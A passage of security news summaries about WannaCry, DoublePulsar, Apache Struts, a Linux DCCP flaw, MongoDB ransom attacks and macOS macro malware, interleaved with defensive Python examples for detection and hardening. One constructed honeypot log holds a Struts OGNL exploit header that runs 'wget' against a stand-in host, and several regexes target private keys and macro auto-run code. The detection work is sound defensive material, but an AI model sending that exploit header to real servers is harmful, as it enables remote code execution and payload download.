Instead, researchers from the Georgia Institute of Technology, the IMDEA Software Institute and EURECOM posit that a better approach would be an analysis of network traffic to suspicious domains that would potentially cut detection times down by weeks or even months.
The researchers’ conclusions are based on a study of five years’ worth of network traffic from a large U.S.-based internet service provider, comprising more than five billion network events. The group had more than 26 million malware samples at their disposal, and studied DNS server requests made by malware and potentially unwanted programs (PUPs), as well as the timing around the registration of expired domains.
The researchers concluded that attackers—including spammers and adware purveyors dabbling in PUPs—re-use infrastructure over and over, and that this re-use provides a better early-detection signal than an exclusive study of malware and PUP domains. They found more than 300,000 malware samples were active for at least two weeks before they were submitted to a feed such as VirusTotal or picked up and analyzed in a vendor feed.
“When we looked at when malware samples actually showed up in malware feeds where they were dynamically analyzed and network signal was extracted from them, we noticed that network signal was extracted in the feed often weeks or months after we saw the first resolutions for that domain in real network traffic from a major ISP in the U.S.,” said Chaz Lever of Georgia Tech, one of the report’s coauthors.
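The correlation the study describes, as an added illustration with constructed data (this is not the researchers' code or dataset; the domains, IPs and timestamps are invented): take the earliest resolution of each domain in passive-DNS records, compare it with the time the sample contacting that domain first had network signal extracted in a feed, and add the infrastructure re-use signal by counting other domains sharing the same answer IP.

```python
"""Correlate first-seen DNS resolutions with malware-feed timing.
Added example with constructed data; not the Georgia Tech/IMDEA/EURECOM code."""
from collections import defaultdict
from datetime import datetime

# Constructed passive-DNS records from "ISP traffic": (UTC timestamp, qname, answer IP)
PASSIVE_DNS = [
    ("2016-01-03T10:00:00", "update.example-cdn.net", "203.0.113.10"),
    ("2016-01-05T11:30:00", "api.example-cdn.net", "203.0.113.10"),
    ("2016-02-20T09:15:00", "stats.example-pup.org", "198.51.100.7"),
]

# Constructed feed records: (time network signal was extracted, sample id, domains contacted)
FEED = [
    ("2016-02-14T00:00:00", "sample-A", ["update.example-cdn.net"]),
    ("2016-02-21T00:00:00", "sample-B", ["stats.example-pup.org"]),
    ("2016-03-01T00:00:00", "sample-C", ["api.example-cdn.net"]),
]


def first_seen(pdns):
    """Earliest resolution time per domain."""
    seen = {}
    for ts, qname, _ip in pdns:
        t = datetime.fromisoformat(ts)
        if qname not in seen or t < seen[qname]:
            seen[qname] = t
    return seen


def domains_per_ip(pdns):
    """IP -> set of domains that resolved to it (the infrastructure re-use signal)."""
    by_ip = defaultdict(set)
    for _ts, qname, ip in pdns:
        by_ip[ip].add(qname)
    return by_ip


def early_detection_candidates(pdns, feed, min_lag_days=14):
    """Domains that resolved in traffic at least min_lag_days before their sample
    reached the feed. Returns {domain: (lag_days, other_domains_on_same_ip)}."""
    seen = first_seen(pdns)
    by_ip = domains_per_ip(pdns)
    ip_of = {qname: ip for _ts, qname, ip in pdns}
    out = {}
    for ts, _sample, qnames in feed:
        feed_time = datetime.fromisoformat(ts)
        for q in qnames:
            if q not in seen:
                continue  # never observed in traffic before the feed: no early signal
            lag = (feed_time - seen[q]).days
            if lag >= min_lag_days:
                out[q] = (lag, len(by_ip[ip_of[q]]) - 1)
    return out


if __name__ == "__main__":
    for d, (lag, shared) in early_detection_candidates(PASSIVE_DNS, FEED).items():
        print(f"{d}: in traffic {lag} days before the feed; shares its IP with {shared} other domain(s)")
```

On the constructed data, two of the three domains resolved in traffic well over two weeks before the feed had any signal for them, and both sit on the same IP, which is the kind of reused infrastructure the study says is worth alerting on before any sample has been analysed.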
msm1267 writes: A ransomware attack running rampant through Europe today is spreading via an exploit leaked in the most recent ShadowBrokers dump.
Researchers said the attackers behind today’s outbreak of WannaCry ransomware are using EternalBlue, an exploit made public by the mysterious group in possession of offensive hacking tools allegedly developed by the NSA.
Most of the attacks are concentrated in Russia, but machines in 74 countries have been infected; researchers at Kaspersky Lab said they’ve recorded more than 45,000 infections so far on their sensors, and expect that number to climb.
Sixteen National Health Service (NHS) organizations in the U.K., several large telecommunications companies and utilities in Spain, and other businesses throughout Europe have been infected. Critical services are being interrupted at hospitals across England, and in other locations, businesses are shutting down IT systems.
msm1267 writes: Drones, many readily available on ecommerce shops such as Amazon, are plagued by vulnerabilities that could give attackers full root access, read or delete files, or crash the device.
The United States Computer Emergency Readiness Team (US-CERT) published a warning about one model, the DBPOWER U818A WiFi quadcopter, last month, but according to the researcher who reported the vulnerabilities, multiple drone models, manufactured by the same company but sold under different names, are also vulnerable.
The drones contain two appealing attack vectors: an open access point and a misconfigured FTP server. If an attacker were within WiFi range of the drone, they could easily obtain read and write permissions to the drone’s filesystem and modify its root password.
Like any attack dependent on Wi-Fi, an attacker would need to be in close proximity to the drone to carry out an attack, but the researcher reasons that an attacker could connect their computer to the drone access point, essentially treating it as a proxy to spy on the device’s live feed or the drone’s open ports.
msm1267 writes: A little more than two weeks after the latest ShadowBrokers leak of NSA hacking tools, experts are certain that the DoublePulsar post-exploitation Windows kernel attack will have similar staying power to the Conficker bug, and that pen-testers will be finding servers exposed to the flaws patched in MS17-010 for years to come.
MS17-010 was released in March and it closes a number of holes in Windows SMB Server exploited by the NSA. Exploits such as EternalBlue, EternalChampion, EternalSynergy and EternalRomance that are part of the Fuzzbunch exploit platform all drop DoublePulsar onto compromised hosts. DoublePulsar is a sophisticated memory-based kernel payload that hooks onto x86 and 64-bit systems and allows an attacker to execute any raw shellcode payload they wish.
“This is a full ring0 payload that gives you full control over the system and you can do what you want to it,” said Sean Dillon, senior security analyst at RiskSense. Dillon was the first to reverse-engineer a DoublePulsar payload, and published his analysis last Friday.
“This is going to be on networks for years to come. The last major vulnerability of this class was MS08-067, and it’s still found in a lot of places,” Dillon said. “I find it everywhere. This is the most critical Windows patch since that vulnerability.”
Dan Tentler, founder and CEO of Phobos Group, said internet-wide scans he’s running have found about 3.1 percent of vulnerable machines are already infected (between 62,000 and 65,000 so far), and that percentage is likely to go up as scans continue.
“This is easily describable as a bloodbath,” Tentler said.
msm1267 writes: Malware scanning services could be the next listening outpost for criminals and nation-state attackers as more of these services such as VirusTotal are becoming containers for personal, business and even classified information because of some organizations’ policy decision to upload every file, document and email for analysis.
Markus Neis, threat intelligence manager at Swisscom AG, this week joined the growing throng of experts warning organizations to be more selective about data sent to scanning services. At the Kaspersky Lab Security Analyst Summit, Neis shared his research into the problem and how with some crafted Yara rules he was able to return thousands of emails marked as confidential, as well as corporate business plans, government emails and 800 FBI Flash Alerts marked as either Amber or Red through the Traffic Light Protocol, neither of which designations is meant to be shared; both are considered classified. Neis said there is no shortage of PGP keys, VPN credentials and SSH private keys sitting in documents uploaded to VirusTotal, and surely other scanning services.
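One way to be "more selective" in practice is a pre-upload gate in the submission pipeline: scan the file for the same kinds of markers Neis hunted with Yara (TLP markings, confidentiality banners, private-key armour) and, when any hit, submit only the file's hash for a lookup instead of the file itself. The following is an added example, not Neis's rules or any vendor's code; the marker list and the hash-only fallback policy are assumptions to tune to your own classification scheme, and the sample inputs are constructed.

```python
import hashlib
import re

# Markers that mean the content itself should not leave the organisation.
# Constructed list: extend with your own classification banners.
PATTERNS = {
    "pgp_private_key": re.compile(r"-----BEGIN PGP PRIVATE KEY BLOCK-----"),
    "ssh_private_key": re.compile(r"-----BEGIN (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "openvpn_inline_secret": re.compile(r"<(?:key|tls-auth|tls-crypt)>"),
    "tlp_amber_or_red": re.compile(r"\bTLP:?\s*(?:AMBER|RED)\b", re.IGNORECASE),
    "confidential_marking": re.compile(
        r"\b(?:CONFIDENTIAL|INTERNAL USE ONLY|NOT FOR DISTRIBUTION)\b", re.IGNORECASE
    ),
}


def sensitive_markers(data: bytes) -> list:
    """Names of the markers found in the file (decoded leniently so binaries still scan)."""
    text = data.decode("utf-8", errors="ignore")
    return sorted(name for name, pat in PATTERNS.items() if pat.search(text))


def submission_plan(data: bytes) -> dict:
    """Decide what goes to the scanning service.

    Anything carrying a marker is looked up by SHA-256 only: the service can still
    tell you whether the sample is known, but never receives the content.
    """
    hits = sensitive_markers(data)
    digest = hashlib.sha256(data).hexdigest()
    if hits:
        return {"action": "hash-lookup-only", "sha256": digest, "reasons": hits}
    return {"action": "upload", "sha256": digest, "reasons": []}


# Constructed samples, not real alerts or keys.
SAMPLE_ALERT = (
    b"From: soc@example.org\r\nSubject: FLASH - indicators for current campaign\r\n"
    b"\r\nTLP:AMBER - do not forward outside the organisation\r\n"
)
SAMPLE_KEY = b"-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n-----END OPENSSH PRIVATE KEY-----\n"
SAMPLE_BINARY = b"MZ\x90\x00\x03\x00\x00\x00 constructed stand-in for an unknown executable"

if __name__ == "__main__":
    for sample in (SAMPLE_ALERT, SAMPLE_KEY, SAMPLE_BINARY):
        print(submission_plan(sample))
```

A hash lookup is not free of leakage either: the query still tells the service, and anyone watching it, that your organisation holds that particular file, so the hash-only path is a policy choice rather than a complete fix.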
msm1267 writes: The Lazarus Group, a nation-state level of attacker tied to the 2014 attacks on Sony Pictures Entertainment, has splintered off a portion of its operation to concentrate on stealing money to fund itself.
The group, widely believed to be North Korean, has been linked to a February 2016 attack against the Bangladesh Central Bank that resulted in more than $850 million in fraudulent SWIFT network transactions, $80 million of which still has not been recovered.
At the Security Analyst Summit, researchers from Kaspersky Lab and BAE Systems explained how the splinter group, known as Bluenoroff, has almost exclusively hit financial institutions, casinos, financial trade software development companies and cryptocurrency businesses. The group has also been connected to an attack earlier this year against banks in Poland, based on code strings and wiper malware discovered and known to be part of Lazarus’ arsenal.
msm1267 writes: Two critics of the government's Going Dark arguments against strong cryptography and encrypted secure messaging applications released a paper that describes a taxonomy of encryption workarounds available to law enforcement.
The paper is not prescriptive. Instead, it explains the technological advantages and shortcomings of six workarounds available to the FBI and local law enforcement in criminal investigations. The paper also explains potential tech and legal hurdles to each.
It also explains difficult conceptual areas for policymakers, many of whom are not schooled technologists and are much more likely to be swayed by emotional and political arguments against crypto, without solid technical reasoning.
msm1267 writes: Recent academic work looking at the degradation of security occurring when HTTPS inspection tools are sitting in TLS traffic streams has been escalated by an alert published Thursday by the Department of Homeland Security.
DHS’ US-CERT warned enterprises that running standalone inspection appliances or other security products with this capability often has a negative effect on secure communication between clients and servers.
“All systems behind a hypertext transfer protocol secure (HTTPS) interception product are potentially affected,” US-CERT said in its alert.
HTTPS inspection boxes sit between clients and servers, decrypting and inspecting encrypted traffic before re-encrypting it and forwarding it to the destination server. A network administrator can only verify the security between the client and the HTTPS inspection tool, which essentially acts as a man-in-the-middle proxy. The client cannot verify how the inspection tool is validating certificates, or whether there is an attacker positioned between the proxy and the target server.
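Two checks a client can still run from behind such a box, as an added example rather than anything from the US-CERT alert or the paper it cites: compare the issuer of the certificate the client actually receives with the issuer recorded out of band (from a network with no inspection in the path), and connect to a host that deliberately serves an invalid certificate to see whether the failure reaches the client or is silently replaced by the proxy's own valid-looking certificate. The certificate dicts below are constructed in the shape `ssl.SSLSocket.getpeercert()` returns; the issuer names are invented, and the live helpers need a real host name and network access.

```python
import socket
import ssl


def rdn_dict(rdns):
    """Flatten the tuple-of-tuples ssl.getpeercert() uses for 'subject' and 'issuer'."""
    out = {}
    for rdn in rdns:
        for key, value in rdn:
            out[key] = value
    return out


def fetch_peer_cert(host, port=443, timeout=5):
    """Live helper: the certificate this client actually sees for host."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


def interception_findings(cert, expected_issuer_cn):
    """Compare the observed issuer with the one recorded on a clean network.

    A mismatch means something between client and server re-signed the
    certificate: an inspection proxy, or an attacker with a CA the client trusts.
    Pinning the SPKI or certificate fingerprint works the same way with less
    dependence on issuer naming.
    """
    issuer = rdn_dict(cert.get("issuer", ()))
    subject = rdn_dict(cert.get("subject", ()))
    findings = []
    observed = issuer.get("commonName", "")
    if observed != expected_issuer_cn:
        findings.append(
            f"{subject.get('commonName', '?')}: issuer {observed!r} != expected "
            f"{expected_issuer_cn!r}; a proxy or attacker re-signed the certificate"
        )
    return findings


def upstream_validation_hidden(bad_host):
    """Live helper. bad_host must deliberately serve an invalid certificate
    (an expired or self-signed test host of your choosing). If the handshake
    fails, the client saw the bad certificate itself. If it succeeds, something
    in the path accepted the bad upstream certificate and hid that from the user,
    which is the weakening US-CERT warns about."""
    try:
        fetch_peer_cert(bad_host)
    except ssl.SSLCertVerificationError:
        return False
    return True


# Constructed getpeercert()-style dicts; the issuer names are invented.
DIRECT_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "issuer": (
        (("organizationName", "Example Public CA Ltd"),),
        (("commonName", "Example Public CA R3"),),
    ),
}
PROXIED_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "issuer": (
        (("organizationName", "Corp IT"),),
        (("commonName", "Corp HTTPS Inspection CA"),),
    ),
}

if __name__ == "__main__":
    for name, cert in (("direct", DIRECT_CERT), ("proxied", PROXIED_CERT)):
        print(name, interception_findings(cert, "Example Public CA R3"))
```

The issuer comparison only tells you that a re-signing device exists; how well that device validates the upstream server is exactly what the second helper probes, and it is the part the client otherwise has no way to see.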
msm1267 writes: Security researchers say malicious traffic generated by exploit kit infections has dropped off 300 percent since 2015. A number of high-profile arrests, including the takedown of the criminals behind the Lurk Trojan and the Angler Exploit Kit, are largely contributing to the silence among exploit kit purveyors on the black market.
Criminals, however, aren't staying still. The dropoff in exploit kit traffic has coincided with a resurgence of some old-school malware distribution techniques such as macro malware and other email-based attacks that are largely responsible for the spread of ransomware, banking Trojans and other threats.
msm1267 writes: Malicious traffic stemming from exploits against the Apache Struts 2 vulnerability disclosed and patched this week has tapered off since Wednesday.
Researchers at Rapid7 published an analysis of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.
Cisco Talos said on Thursday that attacks had risen sharply since word leaked of publicly available exploits and a Metasploit module. But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.
Rapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.
“We are really seeing limited attempts to exploit the vulnerability,” said Tom Sellers, threat analyst and security researcher at Rapid7.
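The distinction Talos and Rapid7 draw, between a benign probe for a vulnerable Struts instance and a request that actually sends a command, can be made from the one header the attack lives in. The following is an added example, not Rapid7's or Talos's tooling, and it assumes the flaw in question is the March 2017 Jakarta Multipart parser bug (S2-045, CVE-2017-5638), in which an OGNL expression is placed in the Content-Type header; the log lines are constructed honeypot output in an invented format.

```python
import re
from collections import Counter

# Constructed honeypot log lines (not Rapid7 or Talos data):
# time, source, method, path, and the Content-Type header value received.
LOG_LINES = """\
2017-03-08T13:02:11Z 192.0.2.10 POST /struts2-showcase/ content_type="multipart/form-data; boundary=----x"
2017-03-08T13:05:42Z 198.51.100.23 POST / content_type="%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='wget http://203.0.113.5/x.sh').(#p=new java.lang.ProcessBuilder(#cmd.split(' '))).(#p.start())}"
2017-03-08T13:09:03Z 203.0.113.77 GET /index.action content_type="%{(#_='multipart/form-data').(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Probe','s2-045'))}"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) content_type="(.*)"$')
# A Content-Type should be a MIME type; an OGNL expression opener has no business there.
OGNL_RE = re.compile(r"[%$]\{")
# Command-execution sinks commonly used in the public exploits and Metasploit module.
EXEC_RE = re.compile(r"ProcessBuilder|getRuntime|\.exec\(|#cmd=")


def classify(content_type):
    """benign: ordinary header; probe: OGNL that only reads or echoes;
    exploit: OGNL that launches a process."""
    if not OGNL_RE.search(content_type):
        return "benign"
    if EXEC_RE.search(content_type):
        return "exploit"
    return "probe"


def summarize(log_text):
    """Count verdicts and list the sources that actually sent commands."""
    counts, exploit_sources = Counter(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _ts, src, _method, _path, ctype = m.groups()
        verdict = classify(ctype)
        counts[verdict] += 1
        if verdict == "exploit" and src not in exploit_sources:
            exploit_sources.append(src)
    return {"counts": dict(counts), "exploit_sources": exploit_sources}


if __name__ == "__main__":
    print(summarize(LOG_LINES))
```

The probe in the sample only asks the server to add a response header, which is how scanners (and curious researchers) confirm the bug without running anything; only the request that builds a `ProcessBuilder` counts as the kind of malicious command Rapid7 saw from two sources.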
msm1267 writes: FBI Director James Comey resurrected the Going Dark debate over strong encryption Wednesday at a cybersecurity conference at Boston College. Comey said the bureau has 1,200 devices it cannot decrypt that were seized at the end of last year; the director used this data point as an illustration of how secure messaging apps and strong encryption hamper criminal and national security investigations.
Comey said it was time for an "adult conversation" about strong encryption, and said that secure apps such as Signal and WhatsApp that offer end-to-end encryption are now default tools for criminals such as drug dealers and pedophiles, whereas prior to the Snowden leak, they were almost exclusively the purview of nation-state actors.
msm1267 writes: Linux providers are busy developing and pushing out patches for a vulnerability in an obscure networking protocol that could allow a local attacker to crash the kernel and elevate privileges.
Google software engineer Andrey Konovalov privately disclosed the vulnerability on Monday. The use-after-free bug could expose Linux servers to memory-based attacks that would allow an attacker to gain root-level privileges and execute code. Konovalov said he will give admins a few days to patch before publishing his proof-of-concept exploit.
The vulnerability, CVE-2017-6074, affects only the IPv6 implementation of the Linux kernel’s Datagram Congestion Control Protocol (DCCP). DCCP is used to manage network traffic congestion on the application layer; it works on both IPv4 and IPv6. No known exploits are in the wild for this bug. In fact, DCCP is largely turned off in most Linux implementations; Red Hat said it combed years’ worth of customer support cases and was unable to find any reports of customers having turned it on.
The Linux kernel has been patched, while Linux providers are rolling out patches for their various implementations.
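"Turned off" needs a caveat: on most distributions DCCP is built as a module that the kernel loads on demand the first time any local user calls `socket(AF_INET6, SOCK_DCCP, ...)`, so a host that has never used DCCP is still reachable by a local attacker unless module autoloading is blocked. A `blacklist dccp` line only stops alias-based loading; the override Red Hat recommended for this CVE, `install dccp /bin/true` in `/etc/modprobe.d/`, makes modprobe run a no-op instead of inserting the module. The following is an added example, not vendor tooling, that reads those files and `/proc/modules` to report where a host stands; the `demo()` fixtures are constructed in temporary directories.

```python
import os
import re
import subprocess
import tempfile

INSTALL_RE = re.compile(r"^\s*install\s+(dccp\w*)\s+(/bin/true|/bin/false)\b")
BLACKLIST_RE = re.compile(r"^\s*blacklist\s+(dccp\w*)\b")


def modprobe_policy(modprobe_dir):
    """Return (modules with an install override, modules that are merely blacklisted)."""
    overridden, blacklisted = set(), set()
    if os.path.isdir(modprobe_dir):
        for name in sorted(os.listdir(modprobe_dir)):
            if not name.endswith(".conf"):
                continue
            with open(os.path.join(modprobe_dir, name)) as fh:
                for line in fh:
                    m = INSTALL_RE.match(line)
                    if m:
                        overridden.add(m.group(1))
                    m = BLACKLIST_RE.match(line)
                    if m:
                        blacklisted.add(m.group(1))
    return overridden, blacklisted


def loaded_dccp_modules(proc_modules="/proc/modules"):
    try:
        with open(proc_modules) as fh:
            return sorted(line.split()[0] for line in fh if line.startswith("dccp"))
    except FileNotFoundError:
        return []


def dccp_status(modprobe_dir="/etc/modprobe.d", proc_modules="/proc/modules"):
    overridden, blacklisted = modprobe_policy(modprobe_dir)
    loaded = loaded_dccp_modules(proc_modules)
    return {
        "loaded": loaded,
        "install_blocked": "dccp" in overridden,
        "blacklist_only": "dccp" in blacklisted and "dccp" not in overridden,
        # Not loaded now, but nothing stops socket(AF_INET6, SOCK_DCCP) from loading it.
        "autoload_possible": not loaded and "dccp" not in overridden,
    }


def modprobe_dry_run(module="dccp"):
    """Live check on a real host: 'modprobe -n -v' prints what would happen
    (including the install override) without loading anything."""
    return subprocess.run(["modprobe", "-n", "-v", module], capture_output=True, text=True).stdout


def demo():
    """Constructed fixtures: one host with the recommended override, one with only a
    blacklist line, and a pseudo /proc/modules in which no dccp module is loaded."""
    proc = os.path.join(tempfile.mkdtemp(), "modules")
    with open(proc, "w") as fh:
        fh.write("ext4 700000 2 - Live 0x0000000000000000\n")
    hardened = tempfile.mkdtemp()
    with open(os.path.join(hardened, "disable-dccp.conf"), "w") as fh:
        fh.write("install dccp /bin/true\n")
    weak = tempfile.mkdtemp()
    with open(os.path.join(weak, "blacklist.conf"), "w") as fh:
        fh.write("blacklist dccp\n")
    return {"hardened": dccp_status(hardened, proc), "weak": dccp_status(weak, proc)}


if __name__ == "__main__":
    print(demo())
    print(dccp_status())
```

Patching remains the fix; the override is the stopgap for the window Konovalov gave admins before publishing his proof of concept, and it is worth keeping afterwards on hosts that have no use for DCCP.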
ad454 writes: Today, 10 years after SHA-1 was first introduced, we are announcing the first practical technique for generating a collision. This represents the culmination of two years of research that sprung from a collaboration between the CWI Institute in Amsterdam and Google. We've summarized how we went about generating a collision below. As a proof of the attack, we are releasing two PDFs that have identical SHA-1 hashes but different content.
msm1267 writes: Recent attacks against insecure MongoDB, Hadoop and CouchDB installations represent a new phase in online extortion, born from ransomware’s roots with the promise of becoming a nemesis for years to come.
“These types of attacks have grown from ones of opportunity to full-scale automated and systematic assaults targeting misconfigured servers containing sensitive data that can be easily hijacked,” said Zohar Alon, co-founder and CEO, security firm Dome9.
Security researchers at Rapid7 estimate that 50 percent of the 56,000 vulnerable MongoDB servers have been ransomed. When it comes to similar misconfigured databases, 58 percent of the 18,000 vulnerable Elasticsearch servers have been ransomed, and of the 4,500 vulnerable CouchDB servers, 10 percent have been ransomed.
“It’s about the path of least resistance for hackers interested in the biggest potential reward,” said Bob Rudis, chief data security officer at Rapid7. “Hackers have decided it’s easier to end-run an enterprise’s multi-million dollar security system and instead simply target an open server.”
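The "open server" in these attacks is usually a two-line misconfiguration: the listener bound to every interface and access control never enabled. The following is an added example, not Rapid7's or Dome9's code, showing a weak `mongod.conf` beside a hardened one and an audit that flags the combination; the configs are constructed, and the reader handles only the two-level `section:` / `  key: value` layout mongod.conf uses rather than full YAML. Elasticsearch (`network.host`) and CouchDB (the default "admin party" with no admin user) have the same shape of problem.

```python
WEAK_CONF = """\
# constructed mongod.conf: listens on every interface, no access control
net:
  port: 27017
  bindIp: 0.0.0.0
storage:
  dbPath: /var/lib/mongodb
"""

HARDENED_CONF = """\
# constructed mongod.conf: loopback only, authorization on
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
storage:
  dbPath: /var/lib/mongodb
"""


def parse_mongod_conf(text):
    """Minimal reader for the two-level layout mongod.conf uses; not a YAML parser."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        if not line[0].isspace():
            section = line.rstrip(":").strip()
            conf.setdefault(section, {})
        elif section is not None and ":" in line:
            key, value = line.strip().split(":", 1)
            conf[section][key.strip()] = value.strip().strip("'\"")
    return conf


def audit_mongod_conf(text):
    """Findings for the two settings that turn a database into a ransom target."""
    conf = parse_mongod_conf(text)
    net, sec = conf.get("net", {}), conf.get("security", {})
    findings = []
    bind = net.get("bindIp")
    addrs = [a.strip() for a in bind.split(",")] if bind else []
    exposed = (
        net.get("bindIpAll", "").lower() == "true"
        or "0.0.0.0" in addrs
        or "::" in addrs
    )
    if bind is None:
        findings.append("bindIp unset: mongod before 3.6 then listens on all interfaces")
    elif exposed:
        findings.append("bindIp exposes the listener on all interfaces")
    if sec.get("authorization", "disabled").lower() != "enabled":
        findings.append("security.authorization not enabled: anyone who can connect is admin")
    if len(findings) == 2:
        findings.append("EXPOSED: unauthenticated database reachable from the network")
    return findings


if __name__ == "__main__":
    print("weak:", audit_mongod_conf(WEAK_CONF))
    print("hardened:", audit_mongod_conf(HARDENED_CONF))
```

A configuration audit only catches hosts you know about; the campaigns described here found their victims with internet-wide scans, so the same check is worth running from the outside against your own address space.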
msm1267 writes: Macro-based malware has crossed the divide between the Windows and Mac platforms.
A cybercrime group whose command and control infrastructure resolves to an IP address geo-located in Russia is using a Word document laced with a malicious macro that executes solely on macOS.
Following the same script as similar Windows-based attacks, the attached documents have a luring subject line, in this case: “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm.” Once a user tries to open the attachment, they’re presented with a familiar dialog box instructing them that macros must be enabled to view the document. If the macro is enabled, it executes its payload, which then tries to download the open source EmPyre post-exploitation agent.
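The same gateway check that stops this lure on Windows works for the macOS variant, because the decision can be made on the container rather than on which platform the macro targets. The following is an added example, not code from the campaign analysis: it opens an OOXML attachment as a zip, looks for a VBA project part and a macro-enabled main content type, and scans the VBA binary for the auto-run procedure names that fire once the user clicks "Enable Macros". The `build_sample()` documents are constructed stand-ins, not the Carnegie-themed .docm.

```python
import io
import zipfile

MACRO_MAIN_TYPES = (
    b"application/vnd.ms-word.document.macroEnabled.main+xml",
    b"application/vnd.ms-excel.sheet.macroEnabled.main+xml",
    b"application/vnd.ms-powerpoint.presentation.macroEnabled.main+xml",
)
# Procedures Office runs without a further click once macros are enabled.
AUTOEXEC_NAMES = (b"AutoOpen", b"Document_Open", b"AutoExec", b"Auto_Open", b"Workbook_Open")


def inspect_ooxml(data):
    """Report VBA presence and auto-run names from an OOXML container.

    The verdict comes from parts and declared content types, not the file
    extension, so a .docm renamed to .docx is still caught. vbaProject.bin is
    MS-OVBA compressed; procedure names usually survive as literals, so the name
    scan is best effort (oletools' olevba does the real decompression).
    """
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        ctypes = z.read("[Content_Types].xml") if "[Content_Types].xml" in names else b""
        vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        autoexec = set()
        for part in vba_parts:
            blob = z.read(part)
            autoexec.update(t.decode() for t in AUTOEXEC_NAMES if t in blob)
    return {
        "macro_enabled_type": any(t in ctypes for t in MACRO_MAIN_TYPES),
        "vba_parts": vba_parts,
        "autoexec_names": sorted(autoexec),
    }


def should_quarantine(report):
    """Gateway policy (an assumption here): any VBA project in mail is held for review."""
    return bool(report["vba_parts"]) or report["macro_enabled_type"]


def build_sample(with_macro):
    """Constructed stand-in attachment, not the document from the campaign."""
    main_type = (
        MACRO_MAIN_TYPES[0]
        if with_macro
        else b"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(
            "[Content_Types].xml",
            b'<?xml version="1.0"?><Types><Override PartName="/word/document.xml" ContentType="'
            + main_type + b'"/></Types>',
        )
        z.writestr("word/document.xml", b"<w:document/>")
        if with_macro:
            # Minimal OLE signature plus a literal procedure name, standing in for a real VBA project.
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1 ... Sub AutoOpen() ...")
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        report = inspect_ooxml(build_sample(flag))
        print(report, "quarantine" if should_quarantine(report) else "deliver")
```

Blocking on the container sidesteps the social-engineering step entirely: the "enable macros to view" dialog is never shown because the document never reaches the user, whichever operating system the payload was written for.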